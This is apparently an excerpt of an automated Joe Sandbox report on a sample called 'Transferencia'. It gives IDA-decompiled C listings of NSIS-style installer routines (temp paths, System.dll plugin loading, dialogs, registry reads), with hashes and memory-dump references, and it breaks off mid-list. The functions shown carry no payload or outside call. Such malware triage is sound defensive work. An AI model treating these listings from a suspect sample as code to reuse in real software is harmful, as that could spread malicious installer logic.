                                                • Instruction ID: c1792dff9018e3c7d7ac3158fe05bd311bc395bc4b40032904b556d4a70b82f0
                                                • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                • Instruction Fuzzy Hash: 83F09031920F1195DB31B754CC55E7766BCEB98765B00843BE681B72C1D3B88A828AEA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00405DE9(WCHAR* _a4) {
                                                				WCHAR* _t9;
                                                
                                                				_t9 = _a4;
                                                				_push( &(_t9[lstrlenW(_t9)]));
                                                				_push(_t9);
                                                				if( *(CharPrevW()) != 0x5c) {
                                                					lstrcatW(_t9, 0x40a014);
                                                				}
                                                				return _t9;
                                                			}




                                                0x00405dea
                                                0x00405df7
                                                0x00405df8
                                                0x00405e03
                                                0x00405e0b
                                                0x00405e0b
                                                0x00405e13

                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DEF
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DF9
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0B
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3081826266
                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction ID: 5df85f57ea55352fd9405ca64aeca33b709f52697b2ce94ac79c97851b919939
                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction Fuzzy Hash: 0BD05E31111A307BC1116B48AD04DDB629CAE85700381042AF141B20A5D778596286FD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E732A10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                				void* _v0;
                                                				void* _t27;
                                                				signed int _t29;
                                                				void* _t30;
                                                				void* _t34;
                                                				void* _t36;
                                                				void* _t38;
                                                				void* _t40;
                                                				void* _t48;
                                                				void* _t54;
                                                				void* _t63;
                                                				void* _t64;
                                                				signed int _t66;
                                                				void* _t67;
                                                				void* _t73;
                                                				void* _t74;
                                                				void* _t77;
                                                				void* _t80;
                                                				void _t81;
                                                				void _t82;
                                                				intOrPtr _t84;
                                                				void* _t86;
                                                				void* _t88;
                                                
                                                				 *0x732a506c = _a8;
                                                				 *0x732a5070 = _a16;
                                                				 *0x732a5074 = _a12;
                                                				_a12( *0x732a5048, E732A1651, _t73);
                                                				_t66 =  *0x732a506c +  *0x732a506c * 4 << 3;
                                                				_t27 = E732A12E3();
                                                				_v0 = _t27;
                                                				_t74 = _t27;
                                                				if( *_t27 == 0) {
                                                					L28:
                                                					return GlobalFree(_t27);
                                                				}
                                                				do {
                                                					_t29 =  *_t74 & 0x0000ffff;
                                                					_t67 = 2;
                                                					_t74 = _t74 + _t67;
                                                					_t88 = _t29 - 0x66;
                                                					if(_t88 > 0) {
                                                						_t30 = _t29 - 0x6c;
                                                						if(_t30 == 0) {
                                                							L23:
                                                							_t31 =  *0x732a5040;
                                                							if( *0x732a5040 == 0) {
                                                								goto L26;
                                                							}
                                                							E732A1603( *0x732a5074, _t31 + 4, _t66);
                                                							_t34 =  *0x732a5040;
                                                							_t86 = _t86 + 0xc;
                                                							 *0x732a5040 =  *_t34;
                                                							L25:
                                                							GlobalFree(_t34);
                                                							goto L26;
                                                						}
                                                						_t36 = _t30 - 4;
                                                						if(_t36 == 0) {
                                                							L13:
                                                							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E732A1312(E732A135A(_t38));
                                                							L14:
                                                							goto L25;
                                                						}
                                                						_t40 = _t36 - _t67;
                                                						if(_t40 == 0) {
                                                							L11:
                                                							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E732A1381(_t80, E732A12E3());
                                                							goto L14;
                                                						}
                                                						L8:
                                                						if(_t40 == 1) {
                                                							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                							_t10 = _t81 + 4; // 0x4
                                                							E732A1603(_t10,  *0x732a5074, _t66);
                                                							_t86 = _t86 + 0xc;
                                                							 *_t81 =  *0x732a5040;
                                                							 *0x732a5040 = _t81;
                                                						}
                                                						goto L26;
                                                					}
                                                					if(_t88 == 0) {
                                                						_t48 =  *0x732a5070;
                                                						_t77 =  *_t48;
                                                						 *_t48 =  *_t77;
                                                						_t49 = _v0;
                                                						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                							E732A1603(_t49, _t77 + 8, 0x38);
                                                							_t86 = _t86 + 0xc;
                                                						}
                                                						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                						GlobalFree(_t77);
                                                						goto L26;
                                                					}
                                                					_t54 = _t29 - 0x46;
                                                					if(_t54 == 0) {
                                                						_t82 = GlobalAlloc(0x40,  *0x732a506c +  *0x732a506c + 8);
                                                						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                						_t14 = _t82 + 8; // 0x8
                                                						E732A1603(_t14, _v0, 0x38);
                                                						_t86 = _t86 + 0xc;
                                                						 *_t82 =  *( *0x732a5070);
                                                						 *( *0x732a5070) = _t82;
                                                						goto L26;
                                                					}
                                                					_t63 = _t54 - 6;
                                                					if(_t63 == 0) {
                                                						goto L23;
                                                					}
                                                					_t64 = _t63 - 4;
                                                					if(_t64 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L13;
                                                					}
                                                					_t40 = _t64 - _t67;
                                                					if(_t40 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L11;
                                                					}
                                                					goto L8;
                                                					L26:
                                                				} while ( *_t74 != 0);
                                                				_t27 = _v0;
                                                				goto L28;
                                                			}


























                                                0x732a10eb
                                                0x732a1100
                                                0x732a1109
                                                0x732a110e
                                                0x732a1119
                                                0x732a111c
                                                0x732a1125
                                                0x732a1129
                                                0x732a112b
                                                0x732a12b0
                                                0x732a12ba
                                                0x732a12ba
                                                0x732a1132
                                                0x732a1132
                                                0x732a1137
                                                0x732a1138
                                                0x732a113a
                                                0x732a113d
                                                0x732a1256
                                                0x732a1259
                                                0x732a1271
                                                0x732a1271
                                                0x732a1278
                                                0x00000000
                                                0x00000000
                                                0x732a1285
                                                0x732a128a
                                                0x732a128f
                                                0x732a1294
                                                0x732a129a
                                                0x732a129b
                                                0x00000000
                                                0x732a129b
                                                0x732a125b
                                                0x732a125e
                                                0x732a11bc
                                                0x732a11bf
                                                0x732a11c2
                                                0x732a11cb
                                                0x732a11d0
                                                0x00000000
                                                0x732a11d1
                                                0x732a1264
                                                0x732a1266
                                                0x732a11a2
                                                0x732a11a5
                                                0x732a11a8
                                                0x732a11b1
                                                0x00000000
                                                0x732a11b1
                                                0x732a1164
                                                0x732a1165
                                                0x732a1177
                                                0x732a1180
                                                0x732a1184
                                                0x732a118e
                                                0x732a1191
                                                0x732a1193
                                                0x732a1193
                                                0x00000000
                                                0x732a1165
                                                0x732a1143
                                                0x732a1218
                                                0x732a121d
                                                0x732a1221
                                                0x732a1223
                                                0x732a122c
                                                0x732a122f
                                                0x732a1238
                                                0x732a123d
                                                0x732a123d
                                                0x732a1247
                                                0x732a124a
                                                0x00000000
                                                0x732a1250
                                                0x732a1149
                                                0x732a114c
                                                0x732a11e9
                                                0x732a11ed
                                                0x732a11f7
                                                0x732a11fb
                                                0x732a1205
                                                0x732a120a
                                                0x732a1211
                                                0x00000000
                                                0x732a1211
                                                0x732a1152
                                                0x732a1155
                                                0x00000000
                                                0x00000000
                                                0x732a115b
                                                0x732a115e
                                                0x732a11b8
                                                0x00000000
                                                0x732a11b8
                                                0x732a1160
                                                0x732a1162
                                                0x732a119e
                                                0x00000000
                                                0x732a119e
                                                0x00000000
                                                0x732a12a1
                                                0x732a12a1
                                                0x732a12ab
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.756317960.00000000732A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732A0000, based on PE: true
                                                • Associated: 00000000.00000002.756311352.00000000732A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756329828.00000000732A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756338430.00000000732A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_732a0000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 6c7bbb6fdd7a2e9b3281f76a47ee4f6d0dd0a2cd8301e01a3ea0b82dc5ce420e
                                                • Instruction ID: c0e6cbffaf54b06527bd807da0706749f69bd17f2f5ce7b5c685dda1691163ed
                                                • Opcode Fuzzy Hash: 6c7bbb6fdd7a2e9b3281f76a47ee4f6d0dd0a2cd8301e01a3ea0b82dc5ce420e
                                                • Instruction Fuzzy Hash: 64515EB6600212DFE7009F6DC848B5677F8EB09725B248129ED4ADB290E774F980EB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                				signed int _t14;
                                                				int _t17;
                                                				void* _t24;
                                                				intOrPtr* _t29;
                                                				void* _t31;
                                                				signed int _t32;
                                                				void* _t35;
                                                				void* _t40;
                                                				signed int _t42;
                                                
                                                				_t29 = __edi;
                                                				_t24 = __ebx;
                                                				_t14 =  *(_t35 - 0x28);
                                                				_t40 = __edx - 0x38;
                                                				 *(_t35 - 0x10) = _t14;
                                                				_t27 = 0 | _t40 == 0x00000000;
                                                				_t32 = _t40 == 0;
                                                				if(_t14 == __ebx) {
                                                					if(__edx != 0x38) {
                                                						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                					} else {
                                                						E00402DA6(0x21);
                                                						E0040653C("C:\Users\jones\AppData\Local\Temp\nstC730.tmp", "C:\Users\jones\AppData\Local\Temp\nstC730.tmp\System.dll", 0x400);
                                                						_t17 = lstrlenA("C:\Users\jones\AppData\Local\Temp\nstC730.tmp\System.dll");
                                                					}
                                                				} else {
                                                					E00402D84(1);
                                                					 *0x40adc8 = __ax;
                                                					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                				}
                                                				 *(_t35 + 8) = _t17;
                                                				if( *_t29 == _t24) {
                                                					L13:
                                                					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                				} else {
                                                					_t31 = E0040647A(_t27, _t29);
                                                					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060EB(_t31, _t31) >= 0) {
                                                						_t14 = E004060BC(_t31, "C:\Users\jones\AppData\Local\Temp\nstC730.tmp\System.dll",  *(_t35 + 8));
                                                						_t42 = _t14;
                                                						if(_t42 == 0) {
                                                							goto L13;
                                                						}
                                                					} else {
                                                						goto L13;
                                                					}
                                                				}
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}












                                                0x0040263e
                                                0x0040263e
                                                0x0040263e
                                                0x00402643
                                                0x00402646
                                                0x00402649
                                                0x0040264e
                                                0x00402650
                                                0x00402670
                                                0x004026aa
                                                0x00402672
                                                0x00402674
                                                0x00402688
                                                0x00402695
                                                0x00402695
                                                0x00402652
                                                0x00402654
                                                0x00402659
                                                0x00402667
                                                0x0040266a
                                                0x004026af
                                                0x004026b2
                                                0x0040292e
                                                0x0040292e
                                                0x004026b8
                                                0x004026c1
                                                0x004026c3
                                                0x004026e2
                                                0x004015b4
                                                0x004015b6
                                                0x00000000
                                                0x004015bc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004026c3
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nstC730.tmp\System.dll), ref: 00402695
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nstC730.tmp$C:\Users\user\AppData\Local\Temp\nstC730.tmp\System.dll
                                                • API String ID: 1659193697-710139636
                                                • Opcode ID: 94b5b71aa4e8bab5ab4092e73ec8dd6b07f14be24c3351a2e68bf7ce1f7f5cb1
                                                • Instruction ID: fdcd3470e26f59c64840f8c249bec33fde4ddddd182ca34a55142dcc3fd3dd5a
                                                • Opcode Fuzzy Hash: 94b5b71aa4e8bab5ab4092e73ec8dd6b07f14be24c3351a2e68bf7ce1f7f5cb1
                                                • Instruction Fuzzy Hash: 6211E772A10315FACB10BBB19F4AE9E7670AF40748F21443FE002B21C1D6FD8891565E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403019(intOrPtr _a4) {
                                                				long _t2;
                                                				struct HWND__* _t3;
                                                				struct HWND__* _t6;
                                                
                                                				if(_a4 == 0) {
                                                					__eflags =  *0x79f700; // 0x0
                                                					if(__eflags == 0) {
                                                						_t2 = GetTickCount();
                                                						__eflags = _t2 -  *0x7a8a6c;
                                                						if(_t2 >  *0x7a8a6c) {
                                                							_t3 = CreateDialogParamW( *0x7a8a60, 0x6f, 0, E00402F93, 0);
                                                							 *0x79f700 = _t3;
                                                							return ShowWindow(_t3, 5);
                                                						}
                                                						return _t2;
                                                					} else {
                                                						return E00406923(0);
                                                					}
                                                				} else {
                                                					_t6 =  *0x79f700; // 0x0
                                                					if(_t6 != 0) {
                                                						_t6 = DestroyWindow(_t6);
                                                					}
                                                					 *0x79f700 = 0;
                                                					return _t6;
                                                				}
                                                			}






                                                0x00403020
                                                0x0040303a
                                                0x00403040
                                                0x0040304a
                                                0x00403050
                                                0x00403056
                                                0x00403067
                                                0x00403070
                                                0x00000000
                                                0x00403075
                                                0x0040307c
                                                0x00403042
                                                0x00403049
                                                0x00403049
                                                0x00403022
                                                0x00403022
                                                0x00403029
                                                0x0040302c
                                                0x0040302c
                                                0x00403032
                                                0x00403039
                                                0x00403039

                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040385A,?), ref: 0040302C
                                                • GetTickCount.KERNEL32 ref: 0040304A
                                                • CreateDialogParamW.USER32 ref: 00403067
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040385A,?), ref: 00403075
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                                                • Instruction ID: 88099082ea7d1cc716486b810d419c96650c49a7fc0f2dc261fb7bb284c478c3
                                                • Opcode Fuzzy Hash: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                                                • Instruction Fuzzy Hash: AEF08230502620AFC2216F50FD0898B7F78FB40B52745C47BF145F15A8CB3C09828B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E004054F0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                				int _t15;
                                                				long _t16;
                                                
                                                				_t15 = _a8;
                                                				if(_t15 != 0x102) {
                                                					if(_t15 != 0x200) {
                                                						_t16 = _a16;
                                                						L7:
                                                						if(_t15 == 0x419 &&  *0x7a1f34 != _t16) {
                                                							_push(_t16);
                                                							_push(6);
                                                							 *0x7a1f34 = _t16;
                                                							E00404EB1();
                                                						}
                                                						L11:
                                                						return CallWindowProcW( *0x7a1f3c, _a4, _t15, _a12, _t16);
                                                					}
                                                					if(IsWindowVisible(_a4) == 0) {
                                                						L10:
                                                						_t16 = _a16;
                                                						goto L11;
                                                					}
                                                					_t16 = E00404E31(_a4, 1);
                                                					_t15 = 0x419;
                                                					goto L7;
                                                				}
                                                				if(_a12 != 0x20) {
                                                					goto L10;
                                                				}
                                                				E004044C2(0x413);
                                                				return 0;
                                                			}





                                                0x004054f4
                                                0x004054fe
                                                0x0040551a
                                                0x0040553c
                                                0x0040553f
                                                0x00405545
                                                0x0040554f
                                                0x00405550
                                                0x00405552
                                                0x00405558
                                                0x00405558
                                                0x00405562
                                                0x00000000
                                                0x00405570
                                                0x00405527
                                                0x0040555f
                                                0x0040555f
                                                0x00000000
                                                0x0040555f
                                                0x00405533
                                                0x00405535
                                                0x00000000
                                                0x00405535
                                                0x00405504
                                                0x00000000
                                                0x00000000
                                                0x0040550b
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 0040551F
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405570
                                                  • Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                                                • Instruction ID: 9d4fd90c1d1287ad01f41678c6dcc1ca6f3bae65868fe0495ea0105890a895ad
                                                • Opcode Fuzzy Hash: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                                                • Instruction Fuzzy Hash: CC01BC71100648BFEF209F11ED80A9B3B27FB84390F548037FA057A2E5C77A8D529A69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E004063E8(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                				int _v8;
                                                				long _t21;
                                                				long _t24;
                                                				char* _t30;
                                                
                                                				asm("sbb eax, eax");
                                                				_v8 = 0x800;
                                                				_t21 = E00406387(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                				_t30 = _a16;
                                                				if(_t21 != 0) {
                                                					L4:
                                                					 *_t30 =  *_t30 & 0x00000000;
                                                				} else {
                                                					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                					_t21 = RegCloseKey(_a20);
                                                					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                						goto L4;
                                                					}
                                                				}
                                                				return _t21;
                                                			}







                                                0x004063f6
                                                0x004063f8
                                                0x00406410
                                                0x00406415
                                                0x0040641a
                                                0x00406458
                                                0x00406458
                                                0x0040641c
                                                0x0040642e
                                                0x00406439
                                                0x0040643f
                                                0x0040644a
                                                0x00000000
                                                0x00000000
                                                0x0040644a
                                                0x0040645e

                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F28,00000000,?,?,Call,?,?,0040664F,80000002), ref: 0040642E
                                                • RegCloseKey.ADVAPI32(?,?,0040664F,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 00406439
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: c8e7ab71330f2791f483a460aa46ee3ca29019eaf6ff50790d5d7e2e81223b20
                                                • Instruction ID: 998e79ef7726f2f5777b90a8cc8b3066c283ada07cb0ab9722e08f3c700fe3cb
                                                • Opcode Fuzzy Hash: c8e7ab71330f2791f483a460aa46ee3ca29019eaf6ff50790d5d7e2e81223b20
                                                • Instruction Fuzzy Hash: D1017C72500209AEDF219F51CC09EDB3BB9EB54364F11803AFD1AA2191D738D968DBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403B34() {
                                                				void* _t2;
                                                				void* _t3;
                                                				void* _t6;
                                                				void* _t8;
                                                
                                                				_t8 =  *0x79ff0c; // 0x9b9af0
                                                				_t3 = E00403B19(_t2, 0);
                                                				if(_t8 != 0) {
                                                					do {
                                                						_t6 = _t8;
                                                						_t8 =  *_t8;
                                                						FreeLibrary( *(_t6 + 8));
                                                						_t3 = GlobalFree(_t6);
                                                					} while (_t8 != 0);
                                                				}
                                                				 *0x79ff0c =  *0x79ff0c & 0x00000000;
                                                				return _t3;
                                                			}







                                                0x00403b35
                                                0x00403b3d
                                                0x00403b44
                                                0x00403b47
                                                0x00403b47
                                                0x00403b49
                                                0x00403b4e
                                                0x00403b55
                                                0x00403b5b
                                                0x00403b5f
                                                0x00403b60
                                                0x00403b68

                                                APIs
                                                • FreeLibrary.KERNEL32(?,76CDFAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B0C,00403A3B,?), ref: 00403B4E
                                                • GlobalFree.KERNEL32 ref: 00403B55
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B34
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
